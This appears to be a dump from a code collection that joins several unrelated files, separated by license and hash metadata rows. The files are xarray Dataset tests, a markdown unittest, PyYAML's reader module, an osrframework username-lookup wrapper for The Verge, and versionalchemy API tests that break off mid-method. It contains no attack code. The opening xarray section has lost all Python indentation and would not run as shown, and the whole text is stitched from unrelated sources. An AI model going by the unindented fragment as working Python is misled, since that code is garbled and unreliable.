# regression test for GH449
df = pd.DataFrame(np.zeros((2, 2)))
df.columns = ['foo', 'foo']
with self.assertRaisesRegexp(ValueError, 'non-unique columns'):
Dataset.from_dataframe(df)
def test_pickle(self):
data = create_test_data()
roundtripped = pickle.loads(pickle.dumps(data))
self.assertDatasetIdentical(data, roundtripped)
# regression test for #167:
self.assertEqual(data.dims, roundtripped.dims)
def test_lazy_load(self):
store = InaccessibleVariableDataStore()
create_test_data().dump_to_store(store)
for decode_cf in [True, False]:
ds = open_dataset(store, decode_cf=decode_cf)
with self.assertRaises(UnexpectedDataAccess):
ds.load()
with self.assertRaises(UnexpectedDataAccess):
ds['var1'].values
# these should not raise UnexpectedDataAccess:
ds.isel(time=10)
ds.isel(time=slice(10), dim1=[0]).isel(dim1=0, dim2=-1)
def test_dropna(self):
x = np.random.randn(4, 4)
x[::2, 0] = np.nan
y = np.random.randn(4)
y[-1] = np.nan
ds = Dataset({'foo': (('a', 'b'), x), 'bar': (('b', y))})
expected = ds.isel(a=slice(1, None, 2))
actual = ds.dropna('a')
self.assertDatasetIdentical(actual, expected)
expected = ds.isel(b=slice(1, 3))
actual = ds.dropna('b')
self.assertDatasetIdentical(actual, expected)
actual = ds.dropna('b', subset=['foo', 'bar'])
self.assertDatasetIdentical(actual, expected)
expected = ds.isel(b=slice(1, None))
actual = ds.dropna('b', subset=['foo'])
self.assertDatasetIdentical(actual, expected)
expected = ds.isel(b=slice(3))
actual = ds.dropna('b', subset=['bar'])
self.assertDatasetIdentical(actual, expected)
actual = ds.dropna('a', subset=[])
self.assertDatasetIdentical(actual, ds)
actual = ds.dropna('a', subset=['bar'])
self.assertDatasetIdentical(actual, ds)
actual = ds.dropna('a', how='all')
self.assertDatasetIdentical(actual, ds)
actual = ds.dropna('b', how='all', subset=['bar'])
expected = ds.isel(b=[0, 1, 2])
self.assertDatasetIdentical(actual, expected)
actual = ds.dropna('b', thresh=1, subset=['bar'])
self.assertDatasetIdentical(actual, expected)
actual = ds.dropna('b', thresh=2)
self.assertDatasetIdentical(actual, ds)
actual = ds.dropna('b', thresh=4)
expected = ds.isel(b=[1, 2, 3])
self.assertDatasetIdentical(actual, expected)
actual = ds.dropna('a', thresh=3)
expected = ds.isel(a=[1, 3])
self.assertDatasetIdentical(actual, ds)
with self.assertRaisesRegexp(ValueError, 'a single dataset dimension'):
ds.dropna('foo')
with self.assertRaisesRegexp(ValueError, 'invalid how'):
ds.dropna('a', how='somehow')
with self.assertRaisesRegexp(TypeError, 'must specify how or thresh'):
ds.dropna('a', how=None)
def test_fillna(self):
ds = Dataset({'a': ('x', [np.nan, 1, np.nan, 3])})
# fill with -1
actual = ds.fillna(-1)
expected = Dataset({'a': ('x', [-1, 1, -1, 3])})
self.assertDatasetIdentical(expected, actual)
actual = ds.fillna({'a': -1})
self.assertDatasetIdentical(expected, actual)
other = Dataset({'a': -1})
actual = ds.fillna(other)
self.assertDatasetIdentical(expected, actual)
actual = ds.fillna({'a': other.a})
self.assertDatasetIdentical(expected, actual)
# fill with range(4)
b = DataArray(range(4), dims='x')
actual = ds.fillna(b)
expected = b.rename('a').to_dataset()
self.assertDatasetIdentical(expected, actual)
actual = ds.fillna(expected)
self.assertDatasetIdentical(expected, actual)
actual = ds.fillna(range(4))
self.assertDatasetIdentical(expected, actual)
actual = ds.fillna(b[:3])
self.assertDatasetIdentical(expected, actual)
# left align variables
ds['b'] = np.nan
actual = ds.fillna({'a': -1, 'c': 'foobar'})
expected = Dataset({'a': ('x', [-1, 1, -1, 3]), 'b': np.nan})
self.assertDatasetIdentical(expected, actual)
with self.assertRaisesRegexp(ValueError, 'no overlapping'):
ds.fillna({'x': 0})
with self.assertRaisesRegexp(ValueError, 'no overlapping'):
ds.fillna(Dataset(coords={'a': 0}))
# groupby
expected = Dataset({'a': ('x', range(4))})
for target in [ds, expected]:
target.coords['b'] = ('x', [0, 0, 1, 1])
actual = ds.groupby('b').fillna(DataArray([0, 2], dims='b'))
self.assertDatasetIdentical(expected, actual)
actual = ds.groupby('b').fillna(Dataset({'a': ('b', [0, 2])}))
self.assertDatasetIdentical(expected, actual)
def test_where(self):
ds = Dataset({'a': ('x', range(5))})
expected = Dataset({'a': ('x', [np.nan, np.nan, 2, 3, 4])})
actual = ds.where(ds > 1)
self.assertDatasetIdentical(expected, actual)
actual = ds.where(ds.a > 1)
self.assertDatasetIdentical(expected, actual)
actual = ds.where(ds.a.values > 1)
self.assertDatasetIdentical(expected, actual)
actual = ds.where(True)
self.assertDatasetIdentical(ds, actual)
expected = ds.copy(deep=True)
expected['a'].values = [np.nan] * 5
actual = ds.where(False)
self.assertDatasetIdentical(expected, actual)
# 2d
ds = Dataset({'a': (('x', 'y'), [[0, 1], [2, 3]])})
expected = Dataset({'a': (('x', 'y'), [[np.nan, 1], [2, 3]])})
actual = ds.where(ds > 0)
self.assertDatasetIdentical(expected, actual)
# groupby
ds = Dataset({'a': ('x', range(5))}, {'c': ('x', [0, 0, 1, 1, 1])})
cond = Dataset({'a': ('c', [True, False])})
expected = ds.copy(deep=True)
expected['a'].values = [0, 1] + [np.nan] * 3
actual = ds.groupby('c').where(cond)
self.assertDatasetIdentical(expected, actual)
def test_reduce(self):
data = create_test_data()
self.assertEqual(len(data.mean().coords), 0)
actual = data.max()
expected = Dataset(dict((k, v.max())
for k, v in iteritems(data.data_vars)))
self.assertDatasetEqual(expected, actual)
self.assertDatasetEqual(data.min(dim=['dim1']),
data.min(dim='dim1'))
for reduct, expected in [('dim2', ['dim1', 'dim3', 'time']),
(['dim2', 'time'], ['dim1', 'dim3']),
(('dim2', 'time'), ['dim1', 'dim3']),
((), ['dim1', 'dim2', 'dim3', 'time'])]:
actual = data.min(dim=reduct).dims
print(reduct, actual, expected)
self.assertItemsEqual(actual, expected)
self.assertDatasetEqual(data.mean(dim=[]), data)
def test_reduce_bad_dim(self):
data = create_test_data()
with self.assertRaisesRegexp(ValueError, 'Dataset does not contain'):
ds = data.mean(dim='bad_dim')
def test_reduce_non_numeric(self):
data1 = create_test_data(seed=44)
data2 = create_test_data(seed=44)
add_vars = {'var4': ['dim1', 'dim2']}
for v, dims in sorted(add_vars.items()):
size = tuple(data1.dims[d] for d in dims)
data = np.random.random_integers(0, 100, size=size).astype(np.str_)
data1[v] = (dims, data, {'foo': 'variable'})
self.assertTrue('var4' not in data1.mean())
self.assertDatasetEqual(data1.mean(), data2.mean())
self.assertDatasetEqual(data1.mean(dim='dim1'),
data2.mean(dim='dim1'))
def test_reduce_strings(self):
expected = Dataset({'x': 'a'})
ds = Dataset({'x': ('y', ['a', 'b'])})
actual = ds.min()
self.assertDatasetIdentical(expected, actual)
expected = Dataset({'x': 'b'})
actual = ds.max()
self.assertDatasetIdentical(expected, actual)
expected = Dataset({'x': 0})
actual = ds.argmin()
self.assertDatasetIdentical(expected, actual)
expected = Dataset({'x': 1})
actual = ds.argmax()
self.assertDatasetIdentical(expected, actual)
expected = Dataset({'x': b'a'})
ds = Dataset({'x': ('y', np.array(['a', 'b'], 'S1'))})
actual = ds.min()
self.assertDatasetIdentical(expected, actual)
expected = Dataset({'x': u'a'})
ds = Dataset({'x': ('y', np.array(['a', 'b'], 'U1'))})
actual = ds.min()
self.assertDatasetIdentical(expected, actual)
def test_reduce_dtypes(self):
# regression test for GH342
expected = Dataset({'x': 1})
actual = Dataset({'x': True}).sum()
self.assertDatasetIdentical(expected, actual)
# regression test for GH505
expected = Dataset({'x': 3})
actual = Dataset({'x': ('y', np.array([1, 2], 'uint16'))}).sum()
self.assertDatasetIdentical(expected, actual)
expected = Dataset({'x': 1 + 1j})
actual = Dataset({'x': ('y', [1, 1j])}).sum()
self.assertDatasetIdentical(expected, actual)
def test_reduce_keep_attrs(self):
data = create_test_data()
_attrs = {'attr1': 'value1', 'attr2': 2929}
attrs = OrderedDict(_attrs)
data.attrs = attrs
# Test dropped attrs
ds = data.mean()
self.assertEqual(ds.attrs, {})
for v in ds.data_vars.values():
self.assertEqual(v.attrs, {})
# Test kept attrs
ds = data.mean(keep_attrs=True)
self.assertEqual(ds.attrs, attrs)
for k, v in ds.data_vars.items():
self.assertEqual(v.attrs, data[k].attrs)
def test_reduce_argmin(self):
# regression test for #205
ds = Dataset({'a': ('x', [0, 1])})
expected = Dataset({'a': ([], 0)})
actual = ds.argmin()
self.assertDatasetIdentical(expected, actual)
actual = ds.argmin('x')
self.assertDatasetIdentical(expected, actual)
def test_reduce_scalars(self):
ds = Dataset({'x': ('a', [2, 2]), 'y': 2, 'z': ('b', [2])})
expected = Dataset({'x': 0, 'y': 0, 'z': 0})
actual = ds.var()
self.assertDatasetIdentical(expected, actual)
def test_reduce_only_one_axis(self):
def mean_only_one_axis(x, axis):
if not isinstance(axis, (int, np.integer)):
raise TypeError('non-integer axis')
return x.mean(axis)
ds = Dataset({'a': (['x', 'y'], [[0, 1, 2, 3, 4]])})
expected = Dataset({'a': ('x', [2])})
actual = ds.reduce(mean_only_one_axis, 'y')
self.assertDatasetIdentical(expected, actual)
with self.assertRaisesRegexp(TypeError, 'non-integer axis'):
ds.reduce(mean_only_one_axis)
with self.assertRaisesRegexp(TypeError, 'non-integer axis'):
ds.reduce(mean_only_one_axis, ['x', 'y'])
def test_count(self):
ds = Dataset({'x': ('a', [np.nan, 1]), 'y': 0, 'z': np.nan})
expected = Dataset({'x': 1, 'y': 1, 'z': 0})
actual = ds.count()
self.assertDatasetIdentical(expected, actual)
def test_apply(self):
data = create_test_data()
data.attrs['foo'] = 'bar'
self.assertDatasetIdentical(data.apply(np.mean), data.mean())
expected = data.mean(keep_attrs=True)
actual = data.apply(lambda x: x.mean(keep_attrs=True), keep_attrs=True)
self.assertDatasetIdentical(expected, actual)
self.assertDatasetIdentical(data.apply(lambda x: x, keep_attrs=True),
data.drop('time'))
def scale(x, multiple=1):
return multiple * x
actual = data.apply(scale, multiple=2)
self.assertDataArrayEqual(actual['var1'], 2 * data['var1'])
self.assertDataArrayIdentical(actual['numbers'], data['numbers'])
actual = data.apply(np.asarray)
expected = data.drop('time') # time is not used on a data var
self.assertDatasetEqual(expected, actual)
def make_example_math_dataset(self):
variables = OrderedDict(
[('bar', ('x', np.arange(100, 400, 100))),
('foo', (('x', 'y'), 1.0 * np.arange(12).reshape(3, 4)))])
coords = {'abc': ('x', ['a', 'b', 'c']),
'y': 10 * np.arange(4)}
ds = Dataset(variables, coords)
ds['foo'][0, 0] = np.nan
return ds
def test_dataset_number_math(self):
ds = self.make_example_math_dataset()
self.assertDatasetIdentical(ds, +ds)
self.assertDatasetIdentical(ds, ds + 0)
self.assertDatasetIdentical(ds, 0 + ds)
self.assertDatasetIdentical(ds, ds + np.array(0))
self.assertDatasetIdentical(ds, np.array(0) + ds)
actual = ds.copy(deep=True)
actual += 0
self.assertDatasetIdentical(ds, actual)
def test_unary_ops(self):
ds = self.make_example_math_dataset()
self.assertDatasetIdentical(ds.apply(abs), abs(ds))
self.assertDatasetIdentical(ds.apply(lambda x: x + 4), ds + 4)
for func in [lambda x: x.isnull(),
lambda x: x.round(),
lambda x: x.astype(int)]:
self.assertDatasetIdentical(ds.apply(func), func(ds))
self.assertDatasetIdentical(ds.isnull(), ~ds.notnull())
# don't actually patch these methods in
with self.assertRaises(AttributeError):
ds.item
with self.assertRaises(AttributeError):
ds.searchsorted
def test_dataset_array_math(self):
ds = self.make_example_math_dataset()
expected = ds.apply(lambda x: x - ds['foo'])
self.assertDatasetIdentical(expected, ds - ds['foo'])
self.assertDatasetIdentical(expected, -ds['foo'] + ds)
self.assertDatasetIdentical(expected, ds - ds['foo'].variable)
self.assertDatasetIdentical(expected, -ds['foo'].variable + ds)
actual = ds.copy(deep=True)
actual -= ds['foo']
self.assertDatasetIdentical(expected, actual)
expected = ds.apply(lambda x: x + ds['bar'])
self.assertDatasetIdentical(expected, ds + ds['bar'])
actual = ds.copy(deep=True)
actual += ds['bar']
self.assertDatasetIdentical(expected, actual)
expected = Dataset({'bar': ds['bar'] + np.arange(3)})
self.assertDatasetIdentical(expected, ds[['bar']] + np.arange(3))
self.assertDatasetIdentical(expected, np.arange(3) + ds[['bar']])
def test_dataset_dataset_math(self):
ds = self.make_example_math_dataset()
self.assertDatasetIdentical(ds, ds + 0 * ds)
self.assertDatasetIdentical(ds, ds + {'foo': 0, 'bar': 0})
expected = ds.apply(lambda x: 2 * x)
self.assertDatasetIdentical(expected, 2 * ds)
self.assertDatasetIdentical(expected, ds + ds)
self.assertDatasetIdentical(expected, ds + ds.data_vars)
self.assertDatasetIdentical(expected, ds + dict(ds.data_vars))
actual = ds.copy(deep=True)
expected_id = id(actual)
actual += ds
self.assertDatasetIdentical(expected, actual)
self.assertEqual(expected_id, id(actual))
self.assertDatasetIdentical(ds == ds, ds.notnull())
subsampled = ds.isel(y=slice(2))
expected = 2 * subsampled
self.assertDatasetIdentical(expected, subsampled + ds)
self.assertDatasetIdentical(expected, ds + subsampled)
def test_dataset_math_auto_align(self):
ds = self.make_example_math_dataset()
subset = ds.isel(x=slice(2), y=[1, 3])
expected = 2 * subset
actual = ds + subset
self.assertDatasetIdentical(expected, actual)
with self.assertRaisesRegexp(ValueError, 'no overlapping labels'):
ds.isel(x=slice(1)) + ds.isel(x=slice(1, None))
actual = ds + ds[['bar']]
expected = (2 * ds[['bar']]).merge(ds.coords)
self.assertDatasetIdentical(expected, actual)
with self.assertRaisesRegexp(ValueError, 'no overlapping data'):
ds + Dataset()
with self.assertRaisesRegexp(ValueError, 'no overlapping data'):
Dataset() + Dataset()
ds2 = Dataset(coords={'bar': 42})
with self.assertRaisesRegexp(ValueError, 'no overlapping data'):
ds + ds2
# maybe unary arithmetic with empty datasets should raise instead?
self.assertDatasetIdentical(Dataset() + 1, Dataset())
for other in [ds.isel(x=slice(2)), ds.bar.isel(x=slice(0))]:
actual = ds.copy(deep=True)
other = ds.isel(x=slice(2))
actual += other
expected = ds + other.reindex_like(ds)
self.assertDatasetIdentical(expected, actual)
def test_dataset_math_errors(self):
ds = self.make_example_math_dataset()
with self.assertRaises(TypeError):
ds['foo'] += ds
with self.assertRaises(TypeError):
ds['foo'].variable += ds
with self.assertRaisesRegexp(ValueError, 'must have the same'):
ds += ds[['bar']]
# verify we can rollback in-place operations if something goes wrong
# nb. inplace datetime64 math actually will work with an integer array
# but not floats thanks to numpy's inconsistent handling
other = DataArray(np.datetime64('2000-01-01T12'), coords={'c': 2})
actual = ds.copy(deep=True)
with self.assertRaises(TypeError):
actual += other
self.assertDatasetIdentical(actual, ds)
def test_dataset_transpose(self):
ds = Dataset({'a': (('x', 'y'), np.random.randn(3, 4)),
'b': (('y', 'x'), np.random.randn(4, 3))})
actual = ds.transpose()
expected = ds.apply(lambda x: x.transpose())
self.assertDatasetIdentical(expected, actual)
actual = ds.T
self.assertDatasetIdentical(expected, actual)
actual = ds.transpose('x', 'y')
expected = ds.apply(lambda x: x.transpose('x', 'y'))
self.assertDatasetIdentical(expected, actual)
ds = create_test_data()
actual = ds.transpose()
for k in ds:
self.assertEqual(actual[k].dims[::-1], ds[k].dims)
new_order = ('dim2', 'dim3', 'dim1', 'time')
actual = ds.transpose(*new_order)
for k in ds:
expected_dims = tuple(d for d in new_order if d in ds[k].dims)
self.assertEqual(actual[k].dims, expected_dims)
with self.assertRaisesRegexp(ValueError, 'arguments to transpose'):
ds.transpose('dim1', 'dim2', 'dim3')
with self.assertRaisesRegexp(ValueError, 'arguments to transpose'):
ds.transpose('dim1', 'dim2', 'dim3', 'time', 'extra_dim')
def test_dataset_diff_n1_simple(self):
ds = Dataset({'foo': ('x', [5, 5, 6, 6])})
actual = ds.diff('x')
expected = Dataset({'foo': ('x', [0, 1, 0])})
expected.coords['x'].values = [1, 2, 3]
self.assertDatasetEqual(expected, actual)
def test_dataset_diff_n1_lower(self):
ds = Dataset({'foo': ('x', [5, 5, 6, 6])})
actual = ds.diff('x', label='lower')
expected = Dataset({'foo': ('x', [0, 1, 0])})
expected.coords['x'].values = [0, 1, 2]
self.assertDatasetEqual(expected, actual)
def test_dataset_diff_n1(self):
ds = create_test_data(seed=1)
actual = ds.diff('dim2')
expected = dict()
expected['var1'] = DataArray(np.diff(ds['var1'].values, axis=1),
[ds['dim1'].values,
ds['dim2'].values[1:]],
['dim1', 'dim2'])
expected['var2'] = DataArray(np.diff(ds['var2'].values, axis=1),
[ds['dim1'].values,
ds['dim2'].values[1:]],
['dim1', 'dim2'])
expected['var3'] = ds['var3']
expected = Dataset(expected, coords={'time': ds['time'].values})
expected.coords['numbers'] = ('dim3', ds['numbers'].values)
self.assertDatasetEqual(expected, actual)
def test_dataset_diff_n2(self):
ds = create_test_data(seed=1)
actual = ds.diff('dim2', n=2)
expected = dict()
expected['var1'] = DataArray(np.diff(ds['var1'].values, axis=1, n=2),
[ds['dim1'].values,
ds['dim2'].values[2:]],
['dim1', 'dim2'])
expected['var2'] = DataArray(np.diff(ds['var2'].values, axis=1, n=2),
[ds['dim1'].values,
ds['dim2'].values[2:]],
['dim1', 'dim2'])
expected['var3'] = ds['var3']
expected = Dataset(expected, coords={'time': ds['time'].values})
expected.coords['numbers'] = ('dim3', ds['numbers'].values)
self.assertDatasetEqual(expected, actual)
def test_dataset_diff_exception_n_neg(self):
ds = create_test_data(seed=1)
with self.assertRaisesRegexp(ValueError, 'must be non-negative'):
ds.diff('dim2', n=-1)
def test_dataset_diff_exception_label_str(self):
ds = create_test_data(seed=1)
with self.assertRaisesRegexp(ValueError, '\'label\' argument has to'):
ds.diff('dim2', label='raise_me')
def test_real_and_imag(self):
attrs = {'foo': 'bar'}
ds = Dataset({'x': ((), 1 + 2j, attrs)}, attrs=attrs)
expected_re = Dataset({'x': ((), 1, attrs)}, attrs=attrs)
self.assertDatasetIdentical(ds.real, expected_re)
expected_im = Dataset({'x': ((), 2, attrs)}, attrs=attrs)
self.assertDatasetIdentical(ds.imag, expected_im)
| apache-2.0 | -6,595,006,660,729,003,000 | 39.5831 | 88 | 0.551531 | false |
zwimer/IntroToOpenSourceLabs | Lab6/markdown.py/test_markdown_unittest.py | 1 | 1156 | '''
Test markdown.py with unittest
To run tests:
python test_markdown_unittest.py
'''
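# Illustrative note (standard unittest CLI usage, not specific to this project):
# a single test method can also be run with, e.g.,
#   python -m unittest test_markdown_unittest.TestMarkdownPy.test_em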
import unittest
from markdown_adapter import run_markdown
class TestMarkdownPy(unittest.TestCase):
def setUp(self):
pass
def test_non_marked_lines(self):
'''
Non-marked lines should only get 'p' tags around all input
'''
self.assertEqual(
run_markdown('this line has no special handling'),
'<p>this line has no special handling</p>')
def test_em(self):
'''
Lines surrounded by asterisks should be wrapped in 'em' tags
'''
self.assertEqual(
run_markdown('*this should be wrapped in em tags*'),
'<p><em>this should be wrapped in em tags</em></p>')
def test_strong(self):
'''
Lines surrounded by double asterisks should be wrapped in 'strong' tags
'''
self.assertEqual(
run_markdown('**this should be wrapped in strong tags**'),
'<p><strong>this should be wrapped in strong tags</strong></p>')
if __name__ == '__main__':
unittest.main()
| mit | 2,382,812,926,050,376,000 | 27.195122 | 80 | 0.577855 | false |
fuchsia-mirror/third_party-pyyaml | lib3/yaml/reader.py | 1 | 6874 | # This module contains abstractions for the input stream. You don't have to
# look further, there is no pretty code.
#
# We define two classes here.
#
# Mark(source, line, column)
# It's just a record and its only use is producing nice error messages.
# Parser does not use it for any other purposes.
#
# Reader(source, data)
# Reader determines the encoding of `data` and converts it to unicode.
# Reader provides the following methods and attributes:
# reader.peek(length=1) - return the next `length` characters
# reader.forward(length=1) - move the current position forward by `length` characters.
# reader.index - the number of the current character.
# reader.line, reader.column - the line and the column of the current character.
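#
# A minimal usage sketch (illustrative only; the byte string below is an assumed
# example input, not part of the original module):
#
#   reader = Reader(b'hello: world\n')
#   reader.peek()        # -> 'h', look ahead without consuming
#   reader.prefix(5)     # -> 'hello'
#   reader.forward(5)    # consume 5 characters, updating index/line/column
#   reader.get_mark()    # Mark usable in error messages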
__all__ = ['Reader', 'ReaderError']
from .error import YAMLError, Mark
import codecs, re
class ReaderError(YAMLError):
def __init__(self, name, position, character, encoding, reason):
self.name = name
self.character = character
self.position = position
self.encoding = encoding
self.reason = reason
def __str__(self):
if isinstance(self.character, bytes):
return "'%s' codec can't decode byte #x%02x: %s\n" \
" in \"%s\", position %d" \
% (self.encoding, ord(self.character), self.reason,
self.name, self.position)
else:
return "unacceptable character #x%04x: %s\n" \
" in \"%s\", position %d" \
% (self.character, self.reason,
self.name, self.position)
class Reader(object):
# Reader:
# - determines the data encoding and converts it to a unicode string,
# - checks if characters are in allowed range,
# - adds '\0' to the end.
# Reader accepts
# - a `bytes` object,
# - a `str` object,
# - a file-like object with its `read` method returning `str`,
# - a file-like object with its `read` method returning `unicode`.
# Yeah, it's ugly and slow.
def __init__(self, stream):
self.name = None
self.stream = None
self.stream_pointer = 0
self.eof = True
self.buffer = ''
self.pointer = 0
self.raw_buffer = None
self.raw_decode = None
self.encoding = None
self.index = 0
self.line = 0
self.column = 0
if isinstance(stream, str):
self.name = "<unicode string>"
self.check_printable(stream)
self.buffer = stream+'\0'
elif isinstance(stream, bytes):
self.name = "<byte string>"
self.raw_buffer = stream
self.determine_encoding()
else:
self.stream = stream
self.name = getattr(stream, 'name', "<file>")
self.eof = False
self.raw_buffer = None
self.determine_encoding()
def peek(self, index=0):
try:
return self.buffer[self.pointer+index]
except IndexError:
self.update(index+1)
return self.buffer[self.pointer+index]
def prefix(self, length=1):
if self.pointer+length >= len(self.buffer):
self.update(length)
return self.buffer[self.pointer:self.pointer+length]
def forward(self, length=1):
if self.pointer+length+1 >= len(self.buffer):
self.update(length+1)
while length:
ch = self.buffer[self.pointer]
self.pointer += 1
self.index += 1
if ch in '\n\x85\u2028\u2029' \
or (ch == '\r' and self.buffer[self.pointer] != '\n'):
self.line += 1
self.column = 0
elif ch != '\uFEFF':
self.column += 1
length -= 1
def get_mark(self):
if self.stream is None:
return Mark(self.name, self.index, self.line, self.column,
self.buffer, self.pointer)
else:
return Mark(self.name, self.index, self.line, self.column,
None, None)
def determine_encoding(self):
while not self.eof and (self.raw_buffer is None or len(self.raw_buffer) < 2):
self.update_raw()
if isinstance(self.raw_buffer, bytes):
if self.raw_buffer.startswith(codecs.BOM_UTF16_LE):
self.raw_decode = codecs.utf_16_le_decode
self.encoding = 'utf-16-le'
elif self.raw_buffer.startswith(codecs.BOM_UTF16_BE):
self.raw_decode = codecs.utf_16_be_decode
self.encoding = 'utf-16-be'
else:
self.raw_decode = codecs.utf_8_decode
self.encoding = 'utf-8'
self.update(1)
NON_PRINTABLE = re.compile('[^\x09\x0A\x0D\x20-\x7E\x85\xA0-\uD7FF\uE000-\uFFFD\U00010000-\U0010ffff]')
def check_printable(self, data):
match = self.NON_PRINTABLE.search(data)
if match:
character = match.group()
position = self.index+(len(self.buffer)-self.pointer)+match.start()
raise ReaderError(self.name, position, ord(character),
'unicode', "special characters are not allowed")
def update(self, length):
if self.raw_buffer is None:
return
self.buffer = self.buffer[self.pointer:]
self.pointer = 0
while len(self.buffer) < length:
if not self.eof:
self.update_raw()
if self.raw_decode is not None:
try:
data, converted = self.raw_decode(self.raw_buffer,
'strict', self.eof)
except UnicodeDecodeError as exc:
character = self.raw_buffer[exc.start]
if self.stream is not None:
position = self.stream_pointer-len(self.raw_buffer)+exc.start
else:
position = exc.start
raise ReaderError(self.name, position, character,
exc.encoding, exc.reason)
else:
data = self.raw_buffer
converted = len(data)
self.check_printable(data)
self.buffer += data
self.raw_buffer = self.raw_buffer[converted:]
if self.eof:
self.buffer += '\0'
self.raw_buffer = None
break
def update_raw(self, size=4096):
data = self.stream.read(size)
if self.raw_buffer is None:
self.raw_buffer = data
else:
self.raw_buffer += data
self.stream_pointer += len(data)
if not data:
self.eof = True
#try:
# import psyco
# psyco.bind(Reader)
#except ImportError:
# pass
| mit | -3,708,321,917,766,483,000 | 34.989529 | 107 | 0.547134 | false |
i3visio/osrframework | osrframework/wrappers/theverge.py | 1 | 3897 | ################################################################################
#
# Copyright 2015-2020 Félix Brezo and Yaiza Rubio
#
# This program is part of OSRFramework. You can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
################################################################################
__author__ = "Felix Brezo, Yaiza Rubio <[email protected]>"
__version__ = "2.0"
from osrframework.utils.platforms import Platform
class Theverge(Platform):
"""A <Platform> object for Theverge"""
def __init__(self):
self.platformName = "Theverge"
self.tags = ["news", "tech"]
########################
# Defining valid modes #
########################
self.isValidMode = {}
self.isValidMode["phonefy"] = False
self.isValidMode["usufy"] = True
self.isValidMode["searchfy"] = False
######################################
# Search URL for the different modes #
######################################
# Strings with the URL for each and every mode
self.url = {}
#self.url["phonefy"] = "http://anyurl.com//phone/" + "<phonefy>"
self.url["usufy"] = "http://www.theverge.com/users/" + "<usufy>"
#self.url["searchfy"] = "http://anyurl.com/search/" + "<searchfy>"
######################################
# Whether the user needs credentials #
######################################
self.needsCredentials = {}
#self.needsCredentials["phonefy"] = False
self.needsCredentials["usufy"] = False
#self.needsCredentials["searchfy"] = False
#################
# Valid queries #
#################
# Strings that will imply that the query number is not appearing
self.validQuery = {}
# The regular expression '.+' will match any query.
#self.validQuery["phonefy"] = ".*"
self.validQuery["usufy"] = ".+"
#self.validQuery["searchfy"] = ".*"
###################
# Not_found clues #
###################
# Strings that will imply that the query number is not appearing
self.notFoundText = {}
#self.notFoundText["phonefy"] = []
self.notFoundText["usufy"] = [ '<title>404 Not found</title>' ]
#self.notFoundText["searchfy"] = []
#########################
# Fields to be searched #
#########################
self.fieldsRegExp = {}
# Definition of regular expressions to be searched in phonefy mode
#self.fieldsRegExp["phonefy"] = {}
# Example of fields:
#self.fieldsRegExp["phonefy"]["i3visio.location"] = ""
# Definition of regular expressions to be searched in usufy mode
self.fieldsRegExp["usufy"] = {}
# Example of fields:
#self.fieldsRegExp["usufy"]["i3visio.location"] = ""
# Definition of regular expressions to be searched in searchfy mode
#self.fieldsRegExp["searchfy"] = {}
# Example of fields:
#self.fieldsRegExp["searchfy"]["i3visio.location"] = ""
################
# Fields found #
################
# This attribute will be fed when running the program.
self.foundFields = {}
| agpl-3.0 | 5,413,026,602,366,703,000 | 37.96 | 80 | 0.523101 | false |
NerdWallet/versionalchemy | tests/test_api.py | 1 | 17354 | from __future__ import absolute_import, division
import copy
from datetime import datetime
from itertools import chain
import six
import sqlalchemy as sa
from six.moves import range, zip
from sqlalchemy import func
from tests.models import ArchiveTable, MultiColumnUserTable, UserTable
from tests.utils import SQLiteTestBase
from versionalchemy.api import delete, get
from versionalchemy.api.data import _get_conditions_list
from versionalchemy.utils import get_dialect
try:
from unittest import mock # PY3
except ImportError:
import mock
class TestDeleteAPI(SQLiteTestBase):
def setUp(self):
super(TestDeleteAPI, self).setUp()
p1 = UserTable(**self.p1)
p3 = UserTable(**self.p3)
self.session.add_all([p1, p3])
self.session.flush()
p1.col1 = 'change1'
p2 = UserTable(**self.p2)
self.session.add_all([p1, p2])
self.session.flush()
p1.col3 = False
p1.col1 = 'change2'
self.session.add(p1)
self.session.flush()
p1.col2 = 15
p2.col2 = 12
self.session.add_all([p1, p2])
self.session.flush()
def test_delete_single_row(self):
conds = [{'product_id': 10}]
delete(UserTable, self.session, conds=conds)
self._verify_deleted(conds[0])
def test_delete_multi_row(self):
conds = [{'product_id': 11}, {'product_id': 10}]
delete(UserTable, self.session, conds=conds)
for c in conds:
self._verify_deleted(c)
def test_delete_rollback(self):
conds = [{'product_id': 10}]
cond_list_1 = _get_conditions_list(UserTable, conds)
with mock.patch(
'versionalchemy.api.data._get_conditions_list',
side_effect=[cond_list_1, Exception()]
):
try:
delete(UserTable, self.session, conds=conds)
self.assertTrue(False, 'Should have raised an exception')
except Exception:
version_col_names = UserTable.va_version_columns
and_clause = sa.and_(*[
getattr(UserTable.ArchiveTable, col_name) == conds[0][col_name]
for col_name in version_col_names
])
res = self.session.execute(
sa.select([func.count(UserTable.ArchiveTable.va_id)])
.where(and_clause)
)
self.assertEqual(res.scalar(), 4)
and_clause = sa.and_(*[
getattr(UserTable, col_name) == conds[0][col_name]
for col_name in version_col_names
])
res = self.session.execute(
sa.select([func.count(UserTable.id)])
.where(and_clause)
)
self.assertEqual(res.scalar(), 1)
class TestMultiColDeleteAPI(SQLiteTestBase):
UserTable = MultiColumnUserTable
def setUp(self):
super(TestMultiColDeleteAPI, self).setUp()
r1 = {
'product_id_1': 11,
'product_id_2': 'foo',
'col1': 'foo',
'col2': 100,
}
p1 = self.UserTable(**r1)
r2 = {
'product_id_1': 11,
'product_id_2': 'bar',
'col1': 'foo',
'col2': 100,
}
p2 = self.UserTable(**r2)
self.session.add_all([p1, p2])
self.session.flush()
p1.col1 = 'change1'
self.session.add(p1)
self.session.flush()
p1.col1 = 'change2'
self.session.add(p1)
self.session.flush()
p1.col2 = 15
p2.col2 = 12
self.session.add_all([p1, p2])
self.session.flush()
def test_delete_single_row(self):
conds = [{'product_id_1': 11, 'product_id_2': 'foo'}]
delete(self.UserTable, self.session, conds=conds)
self._verify_deleted(conds[0])
def test_delete_multi_row(self):
conds = [
{'product_id_1': 11, 'product_id_2': 'bar'},
{'product_id_1': 11, 'product_id_2': 'foo'}
]
delete(self.UserTable, self.session, conds=conds)
for c in conds:
self._verify_deleted(c)
class TestGetAPI(SQLiteTestBase):
def setUp(self):
super(TestGetAPI, self).setUp()
self.p1_history, self.p2_history, self.p3_history = [], [], []
